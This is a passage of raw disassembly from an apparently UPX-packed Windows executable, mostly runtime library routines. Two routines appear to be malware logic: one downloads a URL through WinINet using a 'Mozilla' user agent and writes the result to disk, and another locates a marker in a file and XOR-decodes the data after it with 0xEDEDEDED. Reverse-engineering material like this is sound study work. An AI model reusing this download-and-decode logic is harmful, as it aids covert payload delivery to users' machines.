mov eax, [eax]
loc_401A12: ; CODE XREF: sub_4019F3+1B�j
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_401A21
mov al, 1
jmp short loc_401A23
; ---------------------------------------------------------------------------
loc_401A21: ; CODE XREF: sub_4019F3+16�j
; sub_4019F3+28�j
xor al, al
loc_401A23: ; CODE XREF: sub_4019F3+2C�j
pop esi
retn 4
sub_4019F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A27 proc near ; CODE XREF: sub_401882+50�p
; sub_401882+6C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401A3F
xor ecx, ecx
loc_401A36: ; CODE XREF: sub_401A27+22�j
push ecx
call sub_402371
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401A3F: ; CODE XREF: sub_401A27+B�j
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_401A36
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_4023F1
push offset dword_40E300
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_40C174
call sub_40414D
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_402457
mov dword ptr [esi], offset off_40C174
mov eax, esi
pop esi
retn 4
sub_401A27 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401A89 proc near ; CODE XREF: sub_4017AB+41�p
push 8
mov eax, offset loc_40B0DE
call sub_404591
mov edi, ecx
mov esi, [ebp+8]
call sub_4015B8
and dword ptr [esi+8], 0
and dword ptr [ebp-4], 0
mov [esi+4], eax
mov ecx, [edi+4]
mov edx, [ecx]
mov eax, [eax]
push ecx
push edi
push edx
push edi
push eax
push esi
push dword ptr [ebp+8]
push esi
call sub_401ADC
mov eax, esi
call sub_4045FD
retn 4
sub_401A89 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401ACA proc near ; DATA XREF: UPX1:0040E468�o
mov esi, [ebp+8]
call sub_4015D0
push 0
push 0
call sub_40414D
int 3 ; Trap to Debugger
sub_401ACA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401ADC proc near ; CODE XREF: sub_401A89+32�p
push 14h
mov eax, offset loc_40B0C3
call sub_404591
mov edi, [ebp+18h]
mov esi, [ebp+1Ch]
and dword ptr [ebp-4], 0
mov [ebp-18h], edi
mov [ebp-14h], esi
loc_401AF8: ; CODE XREF: sub_401ADC+66�j
test edi, edi
jz short loc_401B01
cmp edi, [ebp+20h]
jz short loc_401B06
loc_401B01: ; CODE XREF: sub_401ADC+1E�j
call sub_4021B5
loc_401B06: ; CODE XREF: sub_401ADC+23�j
cmp esi, [ebp+24h]
jz loc_401B9D
test edi, edi
jnz short loc_401B18
call sub_4021B5
loc_401B18: ; CODE XREF: sub_401ADC+35�j
cmp esi, [edi+4]
jnz short loc_401B22
call sub_4021B5
loc_401B22: ; CODE XREF: sub_401ADC+3F�j
push dword ptr [ebp+14h]
mov edi, [ebp+8]
push dword ptr [ebp+10h]
add esi, 8
push esi
call sub_401548
lea esi, [ebp+18h]
call sub_401247
mov esi, [ebp+1Ch]
mov edi, [ebp+18h]
jmp short loc_401AF8
; ---------------------------------------------------------------------------
loc_401B44: ; DATA XREF: UPX1:0040E410�o
mov edi, [ebp+14h]
loc_401B47: ; CODE XREF: sub_401ADC+B6�j
mov eax, [ebp-18h]
test eax, eax
jz short loc_401B53
cmp eax, [ebp+18h]
jz short loc_401B58
loc_401B53: ; CODE XREF: sub_401ADC+70�j
call sub_4021B5
loc_401B58: ; CODE XREF: sub_401ADC+75�j
mov eax, [ebp-14h]
cmp eax, [ebp+1Ch]
jz short loc_401B94
mov ebx, [ebp+10h]
test ebx, ebx
mov [ebp+24h], edi
jnz short loc_401B6F
call sub_4021B5
loc_401B6F: ; CODE XREF: sub_401ADC+8C�j
mov esi, [edi+4]
cmp esi, [ebx+4]
jnz short loc_401B7C
call sub_4021B5
loc_401B7C: ; CODE XREF: sub_401ADC+99�j
push esi
push ebx
mov ebx, [ebp+8]
lea eax, [ebp-20h]
push eax
call sub_401BA5
lea esi, [ebp-18h]
call sub_401247
jmp short loc_401B47
; ---------------------------------------------------------------------------
loc_401B94: ; CODE XREF: sub_401ADC+82�j
push 0
push 0
call sub_40414D
loc_401B9D: ; CODE XREF: sub_401ADC+2D�j
call sub_4045FD
retn 20h
sub_401ADC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BA5 proc near ; CODE XREF: sub_401ADC+A9�p
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+arg_4]
mov [ebp+var_8], eax
call sub_401247
cmp edi, [ebx+4]
jz short loc_401BDB
mov eax, [edi+4]
mov ecx, [edi]
mov [eax], ecx
mov eax, [edi]
mov ecx, [edi+4]
push edi
mov [eax+4], ecx
call sub_4023DB
dec dword ptr [ebx+8]
pop ecx
loc_401BDB: ; CODE XREF: sub_401BA5+1B�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov ecx, [ebp+arg_8]
pop edi
mov [eax+4], ecx
pop esi
leave
retn 0Ch
sub_401BA5 endp
; ---------------------------------------------------------------------------
loc_401BEF: ; CODE XREF: UPX0:0040B058�j
mov eax, [esi]
test eax, eax
push edi
mov edi, dword_40C120
jz short loc_401C02
push eax
call edi ; dword_40C120
and dword ptr [esi], 0
loc_401C02: ; CODE XREF: UPX0:00401BFA�j
dec ds:dword_4108BC
jnz short loc_401C1D
mov eax, ds:dword_4108B8
test eax, eax
jz short loc_401C1D
push eax
call edi ; dword_40C120
and ds:dword_4108B8, 0
loc_401C1D: ; CODE XREF: UPX0:00401C08�j
; UPX0:00401C11�j
pop edi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1F proc near ; CODE XREF: sub_4010EC+B4�p
var_534 = dword ptr -534h
var_530 = dword ptr -530h
var_529 = byte ptr -529h
var_528 = dword ptr -528h
var_418 = dword ptr -418h
var_408 = byte ptr -408h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 534h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
mov eax, ds:dword_4108B8
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov esi, ecx
mov edi, edx
jnz short loc_401C63
push ebx
push ebx
push ebx
push ebx
push offset aMozilla ; "Mozilla"
call dword_40C124 ; InternetOpenA
cmp eax, ebx
mov ds:dword_4108B8, eax
jnz short loc_401C63
loc_401C5C: ; CODE XREF: sub_401C1F+5C�j
; sub_401C1F+91�j ...
xor al, al
jmp loc_401D3F
; ---------------------------------------------------------------------------
loc_401C63: ; CODE XREF: sub_401C1F+23�j
; sub_401C1F+3B�j
push ebx
push 800h
push ebx
push ebx
push esi
push eax
call dword_40C12C ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_534], eax
jz short loc_401C5C
push edi
lea esi, [ebp+var_528]
mov [ebp+var_530], ebx
mov [ebp+var_529], 1
call sub_401D77
call sub_401DBB
test al, al
jnz short loc_401CC0
cmp [ebp+var_418], 0FFFFFFFFh
mov [ebp+var_528], offset off_40DAD4
jz short loc_401C5C
push [ebp+var_418]
call dword_40C020 ; CloseHandle
jmp short loc_401C5C
; ---------------------------------------------------------------------------
loc_401CC0: ; CODE XREF: sub_401C1F+7E�j
mov esi, dword_40C128
mov edi, 400h
jmp short loc_401CED
; ---------------------------------------------------------------------------
loc_401CCD: ; CODE XREF: sub_401C1F+E7�j
push [ebp+var_530]
lea eax, [ebp+var_408]
push eax
lea ecx, [ebp+var_528]
call sub_401E45
cmp [ebp+var_530], ebx
jz short loc_401D0E
loc_401CED: ; CODE XREF: sub_401C1F+AC�j
lea eax, [ebp+var_530]
push eax
push edi
lea eax, [ebp+var_408]
push eax
push [ebp+var_534]
call esi ; dword_40C128
test eax, eax
jnz short loc_401CCD
mov [ebp+var_529], bl
loc_401D0E: ; CODE XREF: sub_401C1F+CC�j
push [ebp+var_534]
call dword_40C120 ; InternetCloseHandle
cmp [ebp+var_418], 0FFFFFFFFh
mov [ebp+var_528], offset off_40DAD4
jz short loc_401D39
push [ebp+var_418]
call dword_40C020 ; CloseHandle
loc_401D39: ; CODE XREF: sub_401C1F+10C�j
mov al, [ebp+var_529]
loc_401D3F: ; CODE XREF: sub_401C1F+3F�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_40224A
leave
retn
sub_401C1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D4E proc near ; DATA XREF: UPX1:0040DADC�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
push dword ptr [ecx+110h]
call dword_40C01C ; GetFileSizeEx
cmp eax, 1
jnz short loc_401D70
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
leave
retn
; ---------------------------------------------------------------------------
loc_401D70: ; CODE XREF: sub_401D4E+18�j
or edx, 0FFFFFFFFh
mov eax, edx
leave
retn
sub_401D4E endp
; =============== S U B R O U T I N E =======================================
sub_401D77 proc near ; CODE XREF: sub_401C1F+72�p
arg_0 = dword ptr 4
push [esp+arg_0]
xor eax, eax
mov dword ptr [esi], offset off_40DAD4
mov [esi+10Dh], al
mov [esi+110h], eax
mov [esi+118h], eax
mov [esi+11Ch], eax
call sub_4026A0
push eax
push [esp+8+arg_0]
lea eax, [esi+8]
push 105h
push eax
call sub_4027CB
add esp, 14h
mov eax, esi
retn 4
sub_401D77 endp
; =============== S U B R O U T I N E =======================================
sub_401DBB proc near ; CODE XREF: sub_401C1F+77�p
mov cl, [esi+10Dh]
neg cl
push 0
push 8000000h
push 4
mov eax, 0C0000000h
push 0
push 1
sbb ecx, ecx
and ecx, eax
add ecx, eax
push ecx
lea eax, [esi+8]
push eax
call dword_40C010 ; CreateFileA
and dword ptr [esi+118h], 0
and dword ptr [esi+11Ch], 0
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov [esi+110h], eax
mov al, cl
retn
sub_401DBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E05 proc near ; DATA XREF: UPX1:0040DAD8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov esi, ecx
push [ebp+arg_0]
push dword ptr [esi+110h]
call dword_40C018 ; ReadFile
cmp eax, 1
jnz short loc_401E3E
mov eax, [ebp+var_4]
lea ecx, [esi+118h]
add [ecx], eax
adc dword ptr [ecx+4], 0
jmp short loc_401E40
; ---------------------------------------------------------------------------
loc_401E3E: ; CODE XREF: sub_401E05+26�j
xor eax, eax
loc_401E40: ; CODE XREF: sub_401E05+37�j
pop esi
leave
retn 8
sub_401E05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E45 proc near ; CODE XREF: sub_401C1F+C1�p
; DATA XREF: UPX1:off_40DAD4�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov esi, ecx
push [ebp+arg_0]
push dword ptr [esi+110h]
call dword_40C014 ; WriteFile
cmp eax, 1
jnz short loc_401E7E
mov eax, [ebp+var_4]
lea ecx, [esi+118h]
add [ecx], eax
adc dword ptr [ecx+4], 0
jmp short loc_401E80
; ---------------------------------------------------------------------------
loc_401E7E: ; CODE XREF: sub_401E45+26�j
xor eax, eax
loc_401E80: ; CODE XREF: sub_401E45+37�j
pop esi
leave
retn 8
sub_401E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E85 proc near ; CODE XREF: sub_4010EC+C4�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push esi
push edi
xor edi, edi
push edi
push 80h
push 3
push edi
push edi
push 0C0000000h
push eax
call dword_40C010 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_28], esi
jnz short loc_401EC3
xor al, al
jmp loc_401FBA
; ---------------------------------------------------------------------------
loc_401EC3: ; CODE XREF: sub_401E85+35�j
push ebx
push edi
push esi
call dword_40C024 ; GetFileSize
mov ebx, dword_40C018
mov [ebp+var_24], eax
mov [ebp+var_1C], edi
jmp short loc_401EFB
; ---------------------------------------------------------------------------
loc_401EDA: ; CODE XREF: sub_401E85+89�j
cmp [ebp+var_18], 10h
jnz short loc_401F10
add [ebp+var_1C], 10h
push 10h
lea eax, [ebp+var_14]
push offset dword_40DAE0
push eax
call sub_40287E
add esp, 0Ch
test eax, eax
jz short loc_401F17
loc_401EFB: ; CODE XREF: sub_401E85+53�j
push edi
lea eax, [ebp+var_18]
push eax
push 10h
lea eax, [ebp+var_14]
push eax
push esi
mov [ebp+var_18], edi
call ebx ; dword_40C018
test eax, eax
jnz short loc_401EDA
loc_401F10: ; CODE XREF: sub_401E85+59�j
xor al, al
jmp loc_401FB9
; ---------------------------------------------------------------------------
loc_401F17: ; CODE XREF: sub_401E85+74�j
mov eax, [ebp+var_24]
sub eax, [ebp+var_1C]
xor ecx, ecx
lea esi, [eax+3]
mov [ebp+var_1C], eax
shr esi, 2
push 4
pop edx
mov eax, esi
mul edx
seto cl
neg ecx
or ecx, eax
push ecx
call sub_402371
mov [ebp+var_18], eax
mov eax, esi
shl eax, 2
push eax
push edi
push [ebp+var_18]
mov [ebp+var_24], eax
call sub_4021D0
add esp, 10h
push edi
lea eax, [ebp+var_20]
push eax
push [ebp+var_24]
mov [ebp+var_20], edi
push [ebp+var_18]
push [ebp+var_28]
call ebx ; dword_40C018
xor ecx, ecx
cmp esi, edi
jbe short loc_401F7E
loc_401F6D: ; CODE XREF: sub_401E85+F7�j
mov eax, [ebp+var_18]
lea eax, [eax+ecx*4]
xor dword ptr [eax], 0EDEDEDEDh
inc ecx
cmp ecx, esi
jb short loc_401F6D
loc_401F7E: ; CODE XREF: sub_401E85+E6�j
mov esi, [ebp+var_28]
push edi
push edi
push edi
push esi
call dword_40C028 ; SetFilePointer
push edi
lea eax, [ebp+var_20]
push eax
push [ebp+var_1C]
mov [ebp+var_20], edi
push [ebp+var_18]
push esi
call dword_40C014 ; WriteFile
push esi
call dword_40C02C ; SetEndOfFile
push esi
call dword_40C020 ; CloseHandle
push [ebp+var_18]
call sub_4023DB
pop ecx
mov al, 1
loc_401FB9: ; CODE XREF: sub_401E85+8D�j
pop ebx
loc_401FBA: ; CODE XREF: sub_401E85+39�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_40224A
leave
retn
sub_401E85 endp
; =============== S U B R O U T I N E =======================================
sub_401FC8 proc near ; DATA XREF: UPX1:0040DDF4�o
mov dword ptr [ecx], offset off_40C198
jmp sub_401306
sub_401FC8 endp
; ---------------------------------------------------------------------------
loc_401FD3: ; DATA XREF: UPX0:off_40C198�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_40C198
call sub_401306
test byte ptr [esp+8], 1
jz short loc_401FEF
push esi
call sub_4023DB
pop ecx
loc_401FEF: ; CODE XREF: UPX0:00401FE6�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_401FF5 proc near ; CODE XREF: sub_40171C+D�p
push 44h
mov eax, offset loc_40B01C
call sub_40455E
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call sub_401860
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_4012D1
push offset dword_40E2C8
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_40C18C
call sub_40414D
int 3 ; Trap to Debugger
sub_401FF5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402034 proc near ; CODE XREF: sub_40146B+13�p
; sub_401691+F�p
push 44h
mov eax, offset loc_40B01C
call sub_40455E
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call sub_401860
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_4012D1
push offset dword_40DDF0
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_40C198
call sub_40414D
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_401826
mov dword ptr [esi], offset off_40C198
mov eax, esi
pop esi
retn 4
sub_402034 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40208B proc near ; CODE XREF: sub_405819+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_40FE00, eax
retn
sub_40208B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_402095 proc near ; CODE XREF: sub_402191+1F�j
; sub_405F23+7D�p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_4021D0
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword_40C040 ; IsDebuggerPresent
push 0
mov esi, eax
call dword_40C03C ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword_40C038 ; UnhandledExceptionFilter
test eax, eax
jnz short loc_402169
test esi, esi
jnz short loc_402169
push 2
call sub_404620
pop ecx
loc_402169: ; CODE XREF: sub_402095+C6�j
; sub_402095+CA�j
push 0C000000Dh
call dword_40C034 ; GetCurrentProcess
push eax
call dword_40C030 ; TerminateProcess
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_40224A
add ebp, 2A8h
leave
retn
sub_402095 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402191 proc near ; CODE XREF: sub_4021B5+7�p
; sub_4024EE+26�p ...
push ebp
mov ebp, esp
push ds:dword_40FE00
call sub_40470B
test eax, eax
pop ecx
jz short loc_4021A7
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_4021A7: ; CODE XREF: sub_402191+11�j
push 2
call sub_404620
pop ecx
pop ebp
jmp sub_402095
sub_402191 endp
; =============== S U B R O U T I N E =======================================
sub_4021B5 proc near ; CODE XREF: sub_401000:loc_401033�p
; sub_401000+44�p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402191
add esp, 14h
retn
sub_4021B5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021D0 proc near ; CODE XREF: sub_4010EC+2E�p
; sub_4010EC+71�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402245
xor eax, eax
mov al, [esp+arg_4]
test al, al
jnz short loc_4021FC
cmp edx, 100h
jb short loc_4021FC
cmp ds:dword_410A1C, 0
jz short loc_4021FC
jmp sub_404C3B
; ---------------------------------------------------------------------------
loc_4021FC: ; CODE XREF: sub_4021D0+14�j
; sub_4021D0+1C�j ...
push edi
mov edi, ecx
cmp edx, 4
jb short loc_402235
neg ecx
and ecx, 3
jz short loc_402217
sub edx, ecx
loc_40220D: ; CODE XREF: sub_4021D0+45�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_40220D
loc_402217: ; CODE XREF: sub_4021D0+39�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_402235
rep stosd
test edx, edx
jz short loc_40223F
loc_402235: ; CODE XREF: sub_4021D0+32�j
; sub_4021D0+5D�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_402235
loc_40223F: ; CODE XREF: sub_4021D0+63�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402245: ; CODE XREF: sub_4021D0+A�j
mov eax, [esp+arg_0]
retn
sub_4021D0 endp
; =============== S U B R O U T I N E =======================================
sub_40224A proc near ; CODE XREF: sub_401C1F+128�p
; sub_401E85+13C�p ...
cmp ecx, ds:dword_40F060
jnz short loc_402254
rep retn
; ---------------------------------------------------------------------------
loc_402254: ; CODE XREF: sub_40224A+6�j
jmp sub_404CDE
sub_40224A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402260 proc near ; CODE XREF: sub_4010EC+5B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
jmp short loc_4022D5
; ---------------------------------------------------------------------------
align 10h
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_402290
loc_40227D: ; CODE XREF: sub_402260+2C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_4022C3
test ecx, 3
jnz short loc_40227D
mov edi, edi
loc_402290: ; CODE XREF: sub_402260+1B�j
; sub_402260+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402290
mov eax, [ecx-4]
test al, al
jz short loc_4022D2
test ah, ah
jz short loc_4022CD
test eax, 0FF0000h
jz short loc_4022C8
test eax, 0FF000000h
jz short loc_4022C3
jmp short loc_402290
; ---------------------------------------------------------------------------
loc_4022C3: ; CODE XREF: sub_402260+24�j
; sub_402260+5F�j
lea edi, [ecx-1]
jmp short loc_4022D5
; ---------------------------------------------------------------------------
loc_4022C8: ; CODE XREF: sub_402260+58�j
lea edi, [ecx-2]
jmp short loc_4022D5
; ---------------------------------------------------------------------------
loc_4022CD: ; CODE XREF: sub_402260+51�j
lea edi, [ecx-3]
jmp short loc_4022D5
; ---------------------------------------------------------------------------
loc_4022D2: ; CODE XREF: sub_402260+4D�j
lea edi, [ecx-4]
loc_4022D5: ; CODE XREF: sub_402260+5�j
; sub_402260+66�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4022FE
loc_4022E1: ; CODE XREF: sub_402260+95�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_402350
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_4022E1
jmp short loc_4022FE
; ---------------------------------------------------------------------------
loc_4022F9: ; CODE XREF: sub_402260+B6�j
; sub_402260+D0�j
mov [edi], edx
add edi, 4
loc_4022FE: ; CODE XREF: sub_402260+7F�j
; sub_402260+97�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4022F9
test dl, dl
jz short loc_402350
test dh, dh
jz short loc_402347
test edx, 0FF0000h
jz short loc_40233A
test edx, 0FF000000h
jz short loc_402332
jmp short loc_4022F9
; ---------------------------------------------------------------------------
loc_402332: ; CODE XREF: sub_402260+CE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_402260+C6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_402347: ; CODE XREF: sub_402260+BE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402350: ; CODE XREF: sub_402260+88�j
; sub_402260+BA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402260 endp
; =============== S U B R O U T I N E =======================================
sub_402358 proc near ; CODE XREF: sub_402371+3B�p
push esi
push 1
push offset off_40F030
mov esi, ecx
call sub_40243F
mov dword ptr [esi], offset off_40C174
mov eax, esi
pop esi
retn
sub_402358 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402371 proc near ; CODE XREF: sub_4015B8+2�p
; sub_401679+2�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_402386
; ---------------------------------------------------------------------------
loc_402379: ; CODE XREF: sub_402371+20�j
push [ebp+arg_0]
call sub_404EFE
test eax, eax
pop ecx
jz short loc_402395
loc_402386: ; CODE XREF: sub_402371+6�j
push [ebp+arg_0]
call sub_404E31
test eax, eax
pop ecx
jz short loc_402379
leave
retn
; ---------------------------------------------------------------------------
loc_402395: ; CODE XREF: sub_402371+13�j
test byte ptr ds:dword_40FE10, 1
mov esi, offset dword_40FE04
jnz short loc_4023BC
or ds:dword_40FE10, 1
mov ecx, esi
call sub_402358
push offset loc_40B1D1
call sub_40268D
pop ecx
loc_4023BC: ; CODE XREF: sub_402371+30�j
push esi
lea ecx, [ebp+var_C]
call sub_402457
push offset dword_40E300
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_40C174
call sub_40414D
int 3 ; Trap to Debugger
sub_402371 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4023DB proc near ; CODE XREF: UPX0:004012C4�p
; UPX0:00401341�p ...
jmp sub_404F20
sub_4023DB endp
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; CODE XREF: sub_4012D1+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_40C1CC
retn
sub_4023E0 endp
; =============== S U B R O U T I N E =======================================
sub_4023F1 proc near ; CODE XREF: sub_401A27+2F�p
; sub_407321+15D�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_40C1CC
mov eax, [ebx]
test eax, eax
jz short loc_40242C
push eax
call sub_4026A0
mov esi, eax
inc esi
push esi
call sub_404E31
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_402430
push dword ptr [ebx]
push esi
push eax
call sub_404FAE
add esp, 0Ch
jmp short loc_402430
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_4023F1+13�j
and dword ptr [edi+4], 0
loc_402430: ; CODE XREF: sub_4023F1+2B�j
; sub_4023F1+39�j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_4023F1 endp
; =============== S U B R O U T I N E =======================================
sub_40243F proc near ; CODE XREF: sub_402358+A�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_40C1CC
mov ecx, [ecx]
and dword ptr [eax+8], 0
mov [eax+4], ecx
retn 8
sub_40243F endp
; =============== S U B R O U T I N E =======================================
sub_402457 proc near ; CODE XREF: sub_401826+15�p
; sub_401A27+51�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_40C1CC
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_4024A4
test eax, eax
jz short loc_40249E
push eax
call sub_4026A0
mov edi, eax
inc edi
push edi
call sub_404E31
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_4024A7
push dword ptr [ebx+4]
push edi
push eax
